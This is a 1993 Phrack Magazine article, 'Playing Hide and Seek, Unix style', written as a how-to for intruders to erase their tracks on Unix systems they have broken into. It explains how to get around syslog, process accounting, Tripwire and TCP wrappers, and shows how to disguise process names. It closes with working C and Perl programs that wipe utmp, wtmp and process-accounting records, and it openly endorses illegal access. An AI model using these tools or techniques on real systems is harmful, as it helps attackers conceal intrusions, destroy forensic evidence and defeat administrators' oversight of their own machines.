| |
| ==Phrack Magazine== |
|
|
| Volume Four, Issue Forty-Three, File 14 of 27 |
|
|
| #!/bin/sh |
| # Playing Hide and Seek, Unix style. |
| # By Phreak Accident |
| # |
| # A "how-to" in successfully hiding and removing your electronic footprints |
| # while gaining unauthorized access to someone else's computer system (Unix in |
| # this case). |
|
|
|
|
| # Start counting .. |
|
|
| Hmm. Sucks don't it? Breaking into a system but only to have your access |
| cut off the next day. Right before you had the chance to download that 2 |
| megabyte source code file you have been dying to get all year. |
|
|
| Why was the access cut? Damn, you forgot to nuke that .rhosts file that |
| you left in the root directory. Or maybe it was the wtmp entries you didn't |
| bother to edit. Or perhaps the tcp_wrapper logs that you didn't bother to |
| look for. Whatever it was, it just screwed your access and perhaps, just |
| got you busted. |
|
|
|
|
| ---- Simulated incident report follows: |
|
|
| From: mark@abene.com (Mark Dorkenski) |
| Message-Id: <9305282324.AA11445@jail.abene.com> |
| To: incident-report@cert.org |
| Subject: Cracker Breakin |
| Status: RO |
|
|
| To whom it may concern, |
|
|
| Last night 2 of our machines were penetrated by an unauthorized |
| user. Apparently the cracker (or crackers) involved didn't bother |
| to clean up after they left. |
|
|
| The following are logs generated from the time the break-in |
| occurred. |
|
|
| [/usr/adm/wtmp]: |
|
|
| oracle ttyp1 192.148.8.15 Tue May 11 02:12 - 04:00 (02:12) |
| sync ttyp2 192.148.8.15 Tue May 11 01:47 - 01:47 (00:00) |
| robert console Mon May 10 06:00 - 04:15 (22:14) |
| reboot ~ Mon May 10 05:59 |
| shutdown ~ Sun May 9 11:04 |
|
|
| [/usr/adm/messages]: |
|
|
| May 11 02:02:54 abene.com login: 3 LOGIN FAILURES FROM 192.148.8.15 |
| May 11 02:00:32 abene.com login: 4 LOGIN FAILURES FROM 192.148.8.15 |
|
|
| [/usr/adm/pacct]: |
|
|
| ls - oracle ttyp1 0.00 secs Tue May 2 19:37 |
| cat - oracle ttyp1 0.00 secs Tue May 2 19:37 |
| ls - oracle ttyp1 0.00 secs Tue May 2 19:37 |
| ls - oracle ttyp1 0.00 secs Tue May 2 19:37 |
| rdist - root ttyp1 0.00 secs Tue May 2 19:37 |
| sh - root ttyp0 0.00 secs Tue May 2 19:37 |
| ed - root ttyp0 0.00 secs Tue May 2 19:37 |
| rlogin - root ttyp0 0.00 secs Tue May 2 19:37 |
| ls - root ttyp0 0.00 secs Tue May 2 19:37 |
| more - root ttyp0 0.00 secs Tue May 2 19:34 |
|
|
|
|
| We have found and plugged the areas of vulnerability and have restored |
| original binaries back to the system. We have already informed the proper |
| authorities of the breakin, including the domain contact at the remote |
| host in question. |
|
|
| Can you please relay any information regarding incident reports in our |
| area? |
|
|
|
|
| Mark Dorkenski |
| Network Operations |
|
|
| ---- End of incident report |
|
|
| Hey, it's human nature to be careless and lazy. But, when you're a hacker, |
| and you're illegally breaking into computer systems this isn't a luxury that |
| you can afford. Your efforts in penetrating have to be exact, concise, |
| sharp, witty and skillful. You have to know when to retreat, run, hide, |
| pounce or spy. Let us put it this way, when you get your feet muddy and |
| walk on new carpet without cleaning it up, you're gonna get spanked. |
|
|
| I can't tell you how many times I've see a hacker break into a system and |
| leave their muddy footprints all over the system. Hell, a quarter of the |
| hosts on the Internet need to be steam-cleaned. |
|
|
| This is sad. Especially since you could have had the ability to do the |
| washing yourself. Why bother cracking systems if you leave unauthorized login |
| messages on the console for the administrators? Beats me. |
|
|
| This article is about hiding your access--the little tricks of the trade |
| that keep you unnoticed and hidden from that evil bastard, the system |
| administrator. |
|
|
| I should probably start by explaining exactly where common accounting/log |
| files are kept and their roles in keeping/tracking system information. |
|
|
| # Drinking jolt and jerking the logs |
|
|
| Syslog(3), The "Big Daddy" of logging daemons, is the master of all system |
| accounting and log reporting. Most system components and applications |
| depend on syslogd to deliver the information (accounting, errors, etc.) to |
| the appropriate place. Syslog (syslogd) reads a configuration file |
| (/etc/syslog.conf) on startup to determine what facilities it will support. |
|
|
| Syslog ususally has the following facilities and priorities: |
|
|
| Facilities: kern user mail daemon auth syslog lpr news uucp |
| Priorities: emerg alert crit err warning notice info debug |
|
|
| Facilities are the types of accounting that occur and priorities are the |
| level of urgency that the facilities will report. Most facilities are |
| divided and logged into separate accounting files. The common being daemon, |
| auth, syslog, and kern. |
|
|
| Priorities are encoded as a facility and a level. The facility usually |
| describes the part of the system generating the message. Priorities are |
| defined in <sys/syslog.h>. |
|
|
| In order to by-pass or suspend system accounting it is necessary to |
| understand how it works. With syslog, it is important to know how to |
| read and determine where accounting files are delivered. This entails |
| understanding how syslog configures itself for operation. |
|
|
| # Reading and understanding /etc/syslog.conf. |
|
|
| Lines in the configuration file have a selector to determine the |
| message priorities to which the line applies and an action. The action |
| fields are separated from the selector by one or more tabs. |
|
|
| Selectors are semicolon separated lists of priority specifiers. Each |
| priority has a facility describing the part of the system that generated |
| the message, a dot, and a level indicating the severity of the message. |
| Symbolic names could be used. An asterisk selects all facilities. All |
| messages of the specified level or higher (greater severity) are |
| selected. More than one facility may be selected using commas to separate |
| them. For example: |
|
|
| *.emerg;mail,daemon.crit |
|
|
| selects all facilities at the emerg level and the mail and daemon facil- |
| ities at the crit level. |
|
|
| Known facilities and levels recognized by syslogd are those listed in |
| syslog(3) without the leading ``LOG_''. The additional facility ``mark'' |
| has a message at priority LOG_INFO sent to it every 20 minutes (this may be |
| changed with the -m flag). The ``mark'' facility is not enabled by a |
| facility field containing an asterisk. The level ``none'' may be |
| used to disable a particular facility. For example, |
|
|
| *.debug;mail.none |
|
|
| Sends all messages except mail messages to the selected file. |
|
|
| The second part of each line describes where the message is to be logged |
| if this line is selected. There are four forms: |
|
|
| o A filename (beginning with a leading slash). The file |
| will be opened in append mode. |
|
|
| o A hostname preceded by an at sign (``@''). Selected |
| messages are forwarded to the syslogd on the named host. |
|
|
| o A comma separated list of users. Selected messages are |
| written to those users if they are logged in. |
|
|
| o An asterisk. Selected messages are written to all |
| logged-in users. |
|
|
| For example, the configuration file: |
|
|
| kern,mark.debug /dev/console |
| *.notice;mail.info /usr/spool/adm/syslog |
| *.crit /usr/adm/critical |
| kern.err @phantom.com |
| *.emerg * |
| *.alert erikb,netw1z |
| *.alert;auth.warning ralph |
|
|
| logs all kernel messages and 20 minute marks onto the system |
| console, all notice (or higher) level messages and all mail system messages |
| except debug messages into the file /usr/spool/adm/syslog, and all critical |
| messages into /usr/adm/critical; kernel messages of error severity or |
| higher are forwarded to ucbarpa. All users will be informed of any |
| emergency messages, the users ``erikb'' and ``netw1z'' will be informed of |
| any alert messages, or any warning message (or higher) from the authorization |
| system. |
|
|
| Syslogd creates the file /etc/syslog.pid, if possible, containing a |
| single line with its process id; this is used to kill or reconfigure |
| syslogd. |
|
|
| # System login records |
|
|
| There are there basic areas (files) in which system login information is |
| stored. These areas are: |
|
|
| /usr/etc/wtmp |
| /usr/etc/lastlog |
| /etc/utmp |
|
|
| The utmp file records information about who is currently using the |
| system. The file is a sequence of entries with the following structure |
| declared in the include file (/usr/include/utmp.h): |
|
|
| struct utmp { |
| char ut_line[8]; /* tty name */ |
| char ut_name[8]; /* user id */ |
| char ut_host[16]; /* host name, if remote */ |
| long ut_time; /* time on */ |
| }; |
|
|
| This structure gives the name of the special file associated |
| with the user's terminal, the user's login name, and the |
| time of the login in the form of time(3C). This will vary from platform |
| to platform. Since Sun Microsystems ships SunOs with a world writable |
| /etc/utmp, you can easily take yourself out of any who listing. |
|
|
| The wtmp file records all logins and logouts. A null username |
| indicates a logout on the associated terminal. Furthermore, the terminal |
| name `~' indicates that the system was rebooted at the indicated time; |
| the adjacent pair of entries with terminal names `|' and `{' indicate the |
| system maintained time just before and just after a date command has |
| changed the system's idea of the time. |
|
|
| Wtmp is maintained by login(1) and init(8). Neither of these programs |
| creates the file, so if it is removed or renamed record-keeping is turned off. |
| Wtmp is used in conjunction with the /usr/ucb/last command. |
|
|
| /usr/adm/lastlog is used by login(1) for storing previous login dates, times, |
| and connection locations. The structure for lastlog is as follows: |
|
|
| struct lastlog { |
| time_t ll_time; |
| char ll_line[8]; |
| char ll_host[16]; |
| }; |
|
|
| The structure for lastlog is quite simple. One entry per UID, and it is |
| stored in UID order. |
|
|
| Creating a lastlog and wtmp editor is quite simple. Example programs are |
| appended at the end of this file. |
|
|
| # System process accounting |
|
|
| Usually, the more security-conscience systems will have process accounting |
| turned on which allows the system to log every process that is spawned. |
| /usr/adm/acct or /usr/adm/pacct are the usual logfiles that store the |
| accounting data. These files can grow quite large as you can imagine, and |
| are sometimes shrunk by other system applications and saved in a compressed |
| format as /usr/adm/savacct or something similar. |
|
|
| Usually, if the accounting file is there with a 0 byte length then you can |
| rest assured that they are not keeping process accounting records. If they |
| are however, there are really only two methods of hiding yourself from this |
| form of accounting. One, you can suspend or stop process accounting ( |
| which is usually done with the "accton" command) or you can edit the existing |
| process logfile and "wipe" your incriminating records. |
|
|
| Here is the common structure for the process accounting file: |
|
|
| struct acct |
| { |
| char ac_comm[10]; /* Accounting command name */ |
| comp_t ac_utime; /* Accounting user time */ |
| comp_t ac_stime; /* Accounting system time */ |
| comp_t ac_etime; /* Accounting elapsed time */ |
| time_t ac_btime; /* Beginning time */ |
| uid_t ac_uid; /* Accounting user ID */ |
| gid_t ac_gid; /* Accounting group ID */ |
| short ac_mem; /* average memory usage */ |
| comp_t ac_io; /* number of disk IO blocks */ |
| dev_t ac_tty; /* control typewriter */ |
| char ac_flag; /* Accounting flag */ |
| }; |
|
|
| It is extremely tricky to remove all of your account records since if you |
| do use a program to remove them, the program that you run to wipe the |
| records will still have a process that will be appended to the logfile |
| after it has completed. |
|
|
| An example program for removing process accounting records is included |
| at the end of this article. |
|
|
| Most sysadmins don't pay real attention to the process logs, since they |
| do tend to be rather large and grow fast. However, if they notice that a |
| break-in has occurred, this is one of the primary places they will look for |
| further evidence. |
|
|
| On the other hand, for normal system monitoring, you should be more worried |
| about your "active" processes that might show up in a process table listing |
| (such as ps or top). |
|
|
| Most platforms allow the general changing of the process name without having |
| any kind of privileges to do so. This is done with a simple program as noted |
| below: |
|
|
| #include <stdio.h> |
| #include <string.h> |
|
|
| int main(argc, argv) |
| int argc; |
| char **argv; |
| { |
| char *p; |
|
|
| for (p = argv[0]; *p; p++) |
| *p = 0; |
|
|
| strcpy(argv[0], "rn"); |
|
|
| (void) getchar (); /* to allow you to see that ps reports "rn" */ |
| return(0); |
| } |
|
|
| Basically, this program waits for a key-stroke and then exits. But, |
| while it's waiting, if you were to lookup the process it would show the name |
| as being "rn". You're just actually re-writing the argument list of the |
| spawned process. This is a good method of hiding your process or program |
| names ("crack", "hackit", "icmpnuker"). Its a good idea to use this method |
| in any "rogue" programs you might not want to be discovered by a system |
| administrator. |
|
|
| If you cant corrupt your process arguments, rename your program to something |
| that at least looks normal on the system. But, if you do this, make sure that |
| you don't run the command as "./sh" or "./ping" .. Even this looks suspicious. |
| Put your current path in front of your PATH environment variable and avoid |
| this mistake. |
|
|
| # Tripping the wire |
|
|
| That little piss-ant up at Purdue thinks he has invented a masterpiece.. |
| I'll let his words explain what "Tripwire" is all about. Then, i'll go over |
| some brief flaws in tripwire and how to circumvent it. |
|
|
| ---- Tripwire README Introduction |
|
|
| 1.0. Background |
| ================ |
|
|
| With the advent of increasingly sophisticated and subtle |
| account break-ins on Unix systems, the need for tools to aid in |
| the detection of unauthorized modification of files becomes |
| clear. Tripwire is a tool that aids system administrators and |
| users in monitoring a designated set of files for any changes. |
| Used with system files on a regular (e.g., daily) basis, Tripwire |
| can notify system administrators of corrupted or tampered files, |
| so damage control measures can be taken in a timely manner. |
|
|
| 1.1. Goals of Tripwire |
| ======================= |
|
|
|
|
| Tripwire is a file integrity checker, a utility that compares |
| a designated set of files against information stored in a |
| previously generated database. Any differences are flagged and |
| logged, and optionally, a user is notified through mail. When |
| run against system files on a regular basis, any changes in |
| critical system files will be spotted -- and appropriate damage |
| control measures can be taken immediately. With Tripwire, system |
| administrators can conclude with a high degree of certainty that |
| a given set of files remain free of unauthorized |
| modifications if Tripwire reports no changes. |
|
|
| ---- End of Tripwire excerpt |
|
|
| Ok, so you know what tripwire does. Yup, it creates signatures for all |
| files listed in a tripwire configuration file. So, if you were to change |
| a file that is "tripwired", the proper authorities would be notified and your |
| changes could be recognized. Gee. That sounds great. But there are a |
| couple of problems with this. |
|
|
| First, tripwire wasn't made to run continuously (i.e., a change to a system |
| binary might not be noticed for several hours, perhaps days.) This allows |
| somewhat of a "false" security for those admins who install tripwire. |
|
|
| The first step in beating tripwire is to know if the system you are on |
| is running it. This is trivial at best. The default location where |
| tripwire installs its databases are /usr/adm/tcheck or /usr/local/adm/tcheck. |
|
|
| The "tcheck" directory is basically made up of the following files: |
|
|
| -rw------- 1 root 4867 tw.config |
| drwxr----- 2 root 512 databases |
|
|
| The file "tw.config" is the tripwire configuration file. Basically, it's a |
| list if files that tripwire will create signatures for. This file usually |
| consists of all system binaries, devices, and configuration files. |
|
|
| The directory "databases" contains the actual tripwire signatures for |
| every system that is configured in tw.config. The format for the database |
| filenames are tw.db_HOSTNAME. An example signature entry might look like: |
|
|
| /bin/login 27 ../z/. 100755 901 1 0 0 50412 .g53Lz .g4nrh .g4nrt 0 1vOeWR/aADgc0 |
| oQB7C1cCTMd 1T2ie4.KHLgS0xG2B81TVUfQ 0 0 0 0 0 0 0 |
|
|
| Nothing to get excited about. Basically it is a signature encrypted in one |
| of the many forms supplied by tripwire. Hard to forge, but easy to bypass. |
|
|
| Tripwire takes a long time to check each file or directory listed in |
| the configuration file. Therefore, it is possible to patch or change a system |
| file before tripwire runs a signature check on it. How does one do this? |
| Well, let me explain some more. |
|
|
| In the design of tripwire, the databases are supposed to be kept either on |
| a secure server or a read-only filesystem. Usually, if you would want to |
| patch a system binary 9 times out of 10 you're going to want to have root |
| access. Having root access to by-pass tripwire is a must. Therefore, if you |
| can obtain this access then it is perfectly logical that you should be able to |
| remount a filesystem as Read/Write. Once accomplished, after installing your |
| patched binary, all you have to do is: |
|
|
| tripwire -update PATH_TO_PATCHED_BINARY |
|
|
| Then, you must also: |
|
|
| tripwire -update /usr/adm/tcheck/databases/tw.db_HOSTNAME |
| (If they are making a signature for the tripwire database itself) |
|
|
| You'll still be responsible for the changed inode times on the database. |
| But that's the risk you'll have to live with. Tripewire wont detect the change |
| since you updated the database. But an admin might notice the changed times. |
|
|
| # Wrapping up the wrappers |
|
|
| Ta da. You got the access. uh-oh. What if they are running a TCP |
| wrapper? There are three basic ways they could be running a wrapper. |
|
|
| 1) They have modified /etc/inetd.conf and replaced the daemons they |
| want to wrap with another program that records the incoming |
| hostname and then spawns the correct daemon. |
|
|
| 2) They have replaced the normal daemons (usually in /usr/etc) with |
| a program that records the hostname then launches the correct |
| daemon. |
|
|
| 3) They have modified the actual wrappers themselves to record |
| incoming connections. |
|
|
| In order to bypass or disable them, you'll first need to know which |
| method they are using. |
|
|
| First, view /etc/inetd.conf and check to see if you see something |
| similar to: |
|
|
| telnet stream tcp nowait root /usr/etc/tcpd telnetd ttyXX |
|
|
| This is a sure sign that they are running Wietse Venema's tcp_wrapper. |
|
|
| If nothing is found in /etc/inetd.conf, check /usr/etc and check for any |
| abnormal programs such as "tcpd", "wrapd", and "watchcatd". Finally, if |
| nothing is still found, try checking the actually daemons by running |
| "strings" on them and looking for logfiles or by using sum and comparing them |
| to another system of the same OS that you know is not using a wrapper. |
|
|
| Okay, by now you know whether or not they have a wrapper installed. If |
| so you will have to now decide what to do with the output of the wrapper. |
| You'll have to know where it put the information. The most common wrapper |
| used is tcp_wrapper. Here is another README excerpt detailing where the |
| actually output from the wraps are delivered. |
|
|
| ---- Begin of tcp_wrapper README |
|
|
| 3.2 - Where the logging information goes |
| ---------------------------------------- |
|
|
| The wrapper programs send their logging information to the syslog |
| daemon (syslogd). The disposition of the wrapper logs is determined by |
| the syslog configuration file (usually /etc/syslog.conf). Messages are |
| written to files, to the console, or are forwarded to a @loghost. |
|
|
| Older syslog implementations (still found on Ultrix systems) only |
| support priority levels ranging from 9 (debug-level messages) to 0 |
| (alerts). All logging information of the same priority level (or more |
| urgent) is written to the same destination. In the syslog.conf file, |
| priority levels are specified in numerical form. For example, |
|
|
| 8/usr/spool/mqueue/syslog |
|
|
| causes all messages with priority 8 (informational messages), and |
| anything that is more urgent, to be appended to the file |
| /usr/spool/mqueue/syslog. |
|
|
| Newer syslog implementations support message classes in addition to |
| priority levels. Examples of message classes are: mail, daemon, auth |
| and news. In the syslog.conf file, priority levels are specified with |
| symbolic names: debug, info, notice, ..., emerg. For example, |
|
|
| mail.debug /var/log/syslog |
|
|
| causes all messages of class mail with priority debug (or more urgent) |
| to be appended to the /var/log/syslog file. |
|
|
| By default, the wrapper logs go to the same place as the transaction |
| logs of the sendmail daemon. The disposition can be changed by editing |
| the Makefile and/or the syslog.conf file. Send a `kill -HUP' to the |
| syslogd after changing its configuration file. Remember that syslogd, |
| just like sendmail, insists on one or more TABs between the left-hand |
| side and the right-hand side expressions in its configuration file. |
|
|
| ---- End of tcp_wrapper README |
|
|
| Usually just editing the output and hoping the sysadmin didnt catch the |
| the wrap will do the trick since nothing is output to the console |
| (hopefully). |
|
|
| # Example programs |
|
|
| The following are short and sweet programs that give you the ability |
| to edit some of the more common logfiles found on most platforms. Most |
| of these are pretty simple to compile, although some might need minor |
| porting and OS consideration changes in structures and configurations. |
|
|
| ---- Begin of /etc/utmp editor: |
|
|
| /* This program removes utmp entries by name or number */ |
|
|
| #include <utmp.h> |
| #include <stdio.h> |
| #include <sys/file.h> |
| #include <sys/fcntlcom.h> |
|
|
| void usage(name) |
| char *name; |
| { |
| printf(stdout, "Usage: %s [ user ] or [ tty ]\n", name); |
| exit(1); |
| } |
|
|
| main(argc,argv) |
| int argc; |
| char **argv; |
| { |
| int fd; |
| struct utmp utmp; |
| int size; |
| int match, tty = 0; |
|
|
| if (argc!=2) |
| usage(argv[0]); |
|
|
| if ( !strncmp(argv[1],"tty",3) ) |
| tty++; |
|
|
| fd = open("/etc/utmp",O_RDWR); |
| if (fd >= 0) |
| { |
| size = read(fd, &utmp, sizeof(struct utmp)); |
| while ( size == sizeof(struct utmp) ) |
| { |
| if ( tty ? ( !strcmp(utmp.ut_line, argv[1]) ) : |
| ( !strcmp(utmp.ut_name, argv[1]) ) ) |
| { |
| lseek( fd, -sizeof(struct utmp), L_INCR ); |
| bzero( &utmp, sizeof(struct utmp) ); |
| write( fd, &utmp, sizeof(struct utmp) ); |
| } |
| size = read( fd, &utmp, sizeof(struct utmp) ); |
| } |
| } |
| close(fd); |
| } |
|
|
| ---- End of /etc/utmp editor |
|
|
| ---- Begin of /usr/adm/wtmp editor: |
|
|
| /* This program removes wtmp entries by name or tty number */ |
|
|
| #include <utmp.h> |
| #include <stdio.h> |
| #include <sys/file.h> |
| #include <sys/fcntlcom.h> |
|
|
| void usage(name) |
| char *name; |
| { |
| printf("Usage: %s [ user | tty ]\n", name); |
| exit(1); |
| } |
|
|
| void main (argc, argv) |
| int argc; |
| char *argv[]; |
| { |
| struct utmp utmp; |
| int size, fd, lastone = 0; |
| int match, tty = 0, x = 0; |
|
|
| if (argc>3 || argc<2) |
| usage(argv[0]); |
|
|
| if (strlen(argv[1])<2) { |
| printf("Error: Length of user\n"); |
| exit(1); |
| } |
|
|
| if (argc==3) |
| if (argv[2][0] == 'l') lastone = 1; |
|
|
| if (!strncmp(argv[1],"tty",3)) |
| tty++; |
|
|
| if ((fd = open("/usr/adm/wtmp",O_RDWR))==-1) { |
| printf("Error: Open on /usr/adm/wtmp\n"); |
| exit(1); |
| } |
|
|
| printf("[Searching for %s]: ", argv[1]); |
|
|
| if (fd >= 0) |
| { |
| size = read(fd, &utmp, sizeof(struct utmp)); |
| while ( size == sizeof(struct utmp) ) |
| { |
| if ( tty ? ( !strcmp(utmp.ut_line, argv[1]) ) : |
| ( !strncmp(utmp.ut_name, argv[1], strlen(argv[1])) ) && |
| lastone != 1) |
| { |
| if (x==10) |
| printf("\b%d", x); |
| else |
| if (x>9 && x!=10) |
| printf("\b\b%d", x); |
| else |
| printf("\b%d", x); |
| lseek( fd, -sizeof(struct utmp), L_INCR ); |
| bzero( &utmp, sizeof(struct utmp) ); |
| write( fd, &utmp, sizeof(struct utmp) ); |
| x++; |
| } |
| size = read( fd, &utmp, sizeof(struct utmp) ); |
| } |
| } |
| if (!x) |
| printf("No entries found."); |
| else |
| printf(" entries removed."); |
| printf("\n"); |
| close(fd); |
| } |
|
|
| ---- End of /usr/adm/wtmp editor |
|
|
| ---- Begin of /usr/adm/lastcomm editor: |
|
|
| #!/perl |
|
|
| package LCE; |
|
|
| $date = 'Sun Jul 4 20:35:36 CST 1993'; |
| $title = 'LCE'; |
| $author = 'Phreak Accident'; |
| $version = '0.0'; |
| $copyright = 'Copyright Phreak Accident'; |
|
|
|
|
| #------------------------------------------------------------------------------ |
| # begin getopts.pl |
|
|
| # Usage: &Getopts('a:bc'); # -a takes arg. -b & -c not. Sets opt_*. |
|
|
| sub Getopts { |
| local($argumentative)=@_; |
| local(@args,$_,$first,$rest,$errs); |
| local($[)=0; |
|
|
| @args=split(/ */, $argumentative ); |
| while(($_=$ARGV[0]) =~ /^-(.)(.*)/) { |
| ($first,$rest) = ($1,$2); |
| $pos = index($argumentative,$first); |
| if($pos >= $[) { |
| if($args[$pos+1] eq ':') { |
| shift(@ARGV); |
| if($rest eq '') { |
| $rest = shift(@ARGV); |
| } |
| eval "\$opt_$first = \$rest;"; |
| } |
| else { |
| eval "\$opt_$first = 1"; |
| if($rest eq '') { |
| shift(@ARGV); |
| } |
| else { |
| $ARGV[0] = "-$rest"; |
| } |
| } |
| } |
| else { |
| print STDERR "Unknown option: $first\n"; |
| ++$errs; |
| if($rest ne '') { |
| $ARGV[0] = "-$rest"; |
| } |
| else { |
| shift(@ARGV); |
| } |
| } |
| } |
| $errs == 0; |
| } |
|
|
| # end getopts.pl |
| #------------------------------------------------------------------------------ |
|
|
| sub Initialize { |
|
|
| $TRUE = '1'; # '1' = TRUE = '1' |
| $FALSE = ''; # '' = FALSE = '' |
|
|
| &Getopts('a:u:o:'); # Parse command line options |
| $acct = $opt_a || $ENV{'ACCT'} || '/var/adm/pacct'; |
| $user = $opt_u || $ENV{'USER'} || `/bin/whoami` || 'root'; |
| $outf = $opt_o || $ENV{'OUTF'} || './.pacct'; |
|
|
| select(STDOUT); $|++; |
| close(I); |
| open(I,'(cd /dev; echo tty*)|'); |
| $ttys=<I>; |
| close(I); |
| @ttys = split(/ /,$ttys); |
| for $tty (@ttys) { |
| ($dev,$ino,$mode,$nlink,$uid,$gid,$rdev,$size, |
| $atime,$mtime,$ctime,$blksize,$blocks) = stat("/dev/$tty"); |
| $TTY{"$rdev"} = "$tty"; |
| } |
| $TTY{'65535'} = 'NoTTY'; |
|
|
| # Get passwd info --> id:passwd:uid:gid:name:home:shell |
| close (I); |
| # open(I,"cat /etc/passwd|"); # If you don't run nis... |
| open(I,"ypcat passwd|"); |
| while (<I>) { |
| chop; |
| split(/:/); |
| $PASSWD{"$_[$[+2]"}= $_[$[]; |
| } |
| $PASSWD{"0"}= 'root'; |
|
|
| # Get group info --> id:passwd:gid:members |
| close (I); |
| # open(I,"cat /etc/group|"); # If you don't run nis... |
| open(I,"ypcat group | "); |
| while (<I>) { |
| chop; |
| split(/:/); |
| $GROUP{"$_[$[+2]"}= $_[$[]; |
| } |
| } |
| split(/ /,'Sun Mon Tue Wed Thu Fri Sat'); |
| for ($x=$[ ; $x<$#_ ; $x++) { |
| $DAY{"$x"} = $_[$x]; |
| } |
| split(/ /,'Error Jan Feb Mar Apr MAy Jun Jul Aug Sep Oct Nov Dec'); |
| for ($x=$[ ; $x<$#_ ; $x++) { |
| $MONTH{"$x"} = $_[$x]; |
| } |
|
|
| #------------------------------------------------------------------------------ |
|
|
| sub LCE { |
| &Initialize(); |
| open(I,"<$acct"); |
| close(O); |
| open(O,">$outf"); |
| $template='CCSSSLSSSSSSA8'; |
| while (read(I,$buff,32)) { |
| ($c1,$c2,$u,$g,$d,$bt,$ut,$st,$et,$o4,$o5,$o6,$c3) = |
| unpack($template,$buff); |
| ($sec,$min,$hour,$mday,$mon,$year,$wday,$yday,$isdst) = |
| localtime($bt); |
| $mon++; |
| $mon = "0$mon" if ($mon < 10); |
| $mday = "0$mday" if ($mday < 10); |
| $hour = "0$hour" if ($hour < 10); |
| $min = "0$min" if ($min < 10); |
| $sec = "0$sec" if ($sec < 10); |
| $tt = localtime($bt); |
| $flags=''; |
| if ($c1 & 0001) { $flags .= 'F'; } |
| if ($c1 & 0002) { $flags .= 'S'; } |
| if ($c1 & 0004) { $flags .= 'P'; } |
| if ($c1 & 0010) { $flags .= 'C'; } |
| if ($c1 & 0020) { $flags .= 'K'; } |
| if ($c1 & 0300) { $flags .= 'A'; } |
| $c3 =~ s/\000.*$//; |
| print STDOUT "$c3 $flags $PASSWD{$u}/$GROUP{$g} $TTY{$d}"; |
| print STDOUT " $DAY{$wday} $hour:$min:$sec"; |
| if ($PASSWD{$u} eq $user) { |
| print " [ERASED] "; |
| } else { |
| print O pack($template,$c1,$c2,$u,$g,$d,$bt,$ut,$st,$et,$o4,$o5,$o6,$c3); |
| } |
| print "\n"; |
| } |
| close(O); |
| } |
|
|
| #------------------------------------------------------------------------------ |
|
|
| &LCE(); |
|
|
| #struct acct |
| # { |
| # char ac_flag; /* Accounting flag */ |
| # char ac_stat; /* Exit status */ |
| # uid_t ac_uid; /* Accounting user ID */ |
| # gid_t ac_gid; /* Accounting group ID */ |
| # dev_t ac_tty; /* control typewriter */ |
| # time_t ac_btime; /* Beginning time */ |
| # comp_t ac_utime; /* Accounting user time */ |
| # comp_t ac_stime; /* Accounting system time */ |
| # comp_t ac_etime; /* Accounting elapsed time */ |
| # comp_t ac_mem; /* average memory usage */ |
| # comp_t ac_io; /* chars transferred */ |
| # comp_t ac_rw; /* blocks read or written */ |
| # char ac_comm[8]; /* Accounting command name */ |
| # }; |
| # |
| # #define AFORK 0001 /* has executed fork, but no exec */ |
| # #define ASU 0002 /* used super-user privileges */ |
| # #define ACOMPAT 0004 /* used compatibility mode */ |
| # #define ACORE 0010 /* dumped core */ |
| # #define AXSIG 0020 /* killed by a signal */ |
| # #define ACCTF 0300 /* record type: 00 = acct */ |
|
|
| ---- End of /usr/adm/lastcomm editor |
|
|
| # All good things must come to an end |
|
|
| In conclusion, you need to be smarter than the administrator. Being |
| careless can get you busted. Clean your footprints. Watch the system. |
| Learn new tricks. AND KEEP ON HACKING! |
|
|
| Watch for my next article on 50 great system patches that will keep |
| your access just the way it is .. illegal. Yaawhoo. |
|
|
| # End of article |
|
|